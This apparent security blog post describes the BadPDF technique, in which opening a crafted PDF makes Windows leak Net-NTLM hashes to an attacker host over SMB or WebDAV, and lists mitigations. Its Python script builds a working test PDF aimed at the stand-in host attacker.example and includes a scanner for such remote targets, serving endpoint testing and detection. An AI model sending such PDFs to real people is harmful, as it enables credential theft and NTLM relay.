Sunday, May 6, 2018

Stealing NTLM hashes with BadPDF - a technique that bypasses AV and endpoint protection

On April 26, 2018, the Check Point research team published a technique that can be embedded in an otherwise ordinary PDF file and sent to victims. When the victim opens the malicious PDF, the reader follows a file reference inside the document to an attacker-controlled UNC path, and Windows transparently tries to authenticate to that host. What leaks over SMB is the NTLM challenge-response (a Net-NTLM hash), which can be cracked offline or used in a relay attack; the user never sees a prompt.

I created a malicious PDF and tested it on my personal machine, which was fully equipped with cutting-edge endpoint protection. It leaked the NTLM hash to the attacker. As long as outbound SMB is allowed from the victim's machine, the hash leaks through it.

I assumed that disabling SMB would patch the issue, so I turned off SMB on the machine, downloaded the PDF via the web browser and opened it only in Chrome. In that case the browser made an HTTP request to the attacker's machine, leaking the NTLM hash value. This is consistent with Windows' WebDAV fallback: when a UNC path cannot be reached over SMB (TCP 445), the WebClient service retries the same path over HTTP (TCP 80) and will still answer an NTLM challenge there. Blocking port 445 alone is therefore not a fix. Block outbound 80 and 445 to untrusted networks, disable the WebClient service where it is not needed, or restrict outgoing NTLM with the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy, then re-test.

You can add this to your list of test cases when evaluating any AV, anti-malware or endpoint protection tool.
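To make that test case reproducible, here is an added example (my own code, not the post's PoC and not the Bad-PDF tool) that builds a minimal single-page PDF whose /OpenAction is a /GoToE action with a UNC file target, and a scanner that flags any /F, /UF or /URI literal string in a PDF that points off-host. The hostname attacker.example is a hypothetical placeholder; point the generated file at a listener you control (for example Responder or a WebDAV server) only on a lab network.

```python
"""Added example: build a Bad-PDF-style test file and scan PDFs for remote
file/URI targets. Hostnames below are hypothetical placeholders."""
import re
from typing import Optional

# /F, /UF (file specifications) and /URI written as literal strings "(...)"
KEY_RE = re.compile(rb"/(F|UF|URI)\s*\(")


def pdf_string(s: str) -> bytes:
    """Encode s as a PDF literal string, escaping backslash and parentheses."""
    esc = s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")
    return b"(" + esc.encode("latin-1") + b")"


def build_test_pdf(target: str) -> bytes:
    """Single-page PDF whose OpenAction is a GoToE pointing at `target`.
    With a UNC target (\\\\host\\share\\x.pdf) a reader that honours the action
    makes Windows open the path over SMB, falling back to WebDAV on port 80."""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /S /GoToE /F " + pdf_string(target) + b" /D [0 /Fit] >>",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objs, 1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_at = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (
        len(objs) + 1, xref_at)
    return bytes(out)


def read_literal(data: bytes, start: int) -> tuple:
    """start is just past '('; return (raw body, index past the closing ')').
    Honours backslash escapes and balanced nested parentheses."""
    depth, i = 1, start
    while i < len(data):
        c = data[i]
        if c == 0x5C:            # backslash: skip the escaped byte
            i += 2
            continue
        if c == 0x28:            # '('
            depth += 1
        elif c == 0x29:          # ')'
            depth -= 1
            if depth == 0:
                return data[start:i], i + 1
        i += 1
    return data[start:], len(data)


def decode_literal(raw: bytes) -> str:
    """Undo PDF literal-string escapes: \\n \\r \\t \\b \\f, \\ddd octal, and
    \\\\ \\( \\) (any other escaped byte is kept as itself)."""
    simple = {b"n": "\n", b"r": "\r", b"t": "\t", b"b": "\b", b"f": "\f"}
    out, i = [], 0
    while i < len(raw):
        c = raw[i:i + 1]
        if c != b"\\":
            out.append(c.decode("latin-1"))
            i += 1
            continue
        nxt = raw[i + 1:i + 2]
        if nxt in simple:
            out.append(simple[nxt])
            i += 2
        elif nxt and nxt in b"01234567":
            j = i + 1
            while j < min(len(raw), i + 4) and raw[j:j + 1] in b"01234567":
                j += 1
            out.append(chr(int(raw[i + 1:j], 8)))
            i = j
        else:
            out.append(nxt.decode("latin-1"))
            i += 2
    return "".join(out)


def classify(target: str) -> Optional[str]:
    """'unc' for \\\\host\\share or PDF-style //host/share, 'url' for http(s)/file."""
    t = target.strip()
    if t.startswith("\\\\") or t.startswith("//"):
        return "unc"
    if t.lower().startswith(("http://", "https://", "file://")):
        return "url"
    return None


def find_remote_targets(pdf: bytes) -> list:
    """(key, decoded target, kind) for every off-host /F, /UF or /URI string.
    Limitation: dictionaries inside compressed object streams and hex-string
    (<...>) targets are not seen; inflate first or use a full PDF parser."""
    hits = []
    for m in KEY_RE.finditer(pdf):
        raw, _ = read_literal(pdf, m.end())
        target = decode_literal(raw)
        kind = classify(target)
        if kind:
            hits.append((m.group(1).decode(), target, kind))
    return hits


if __name__ == "__main__":
    sample = build_test_pdf("\\\\attacker.example\\share\\doc.pdf")  # hypothetical host
    for key, target, kind in find_remote_targets(sample):
        print(f"{kind}: /{key} -> {target}")
```

Write the bytes from build_test_pdf to a file, open it with the reader under test while a listener waits on the target host, and treat any inbound NTLM negotiation on 445 or 80 as a failed test for the endpoint product. The scanner is deliberately a byte-level first pass: it catches the plain form used by Bad-PDF-style generators, but a sample that hides the action dictionary in a compressed object stream needs decompression (or a real parser such as pdfminer or PyPDF) before this logic applies.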

Here is the PoC screenshot -

Tool used to create the PDF -
Motivation -
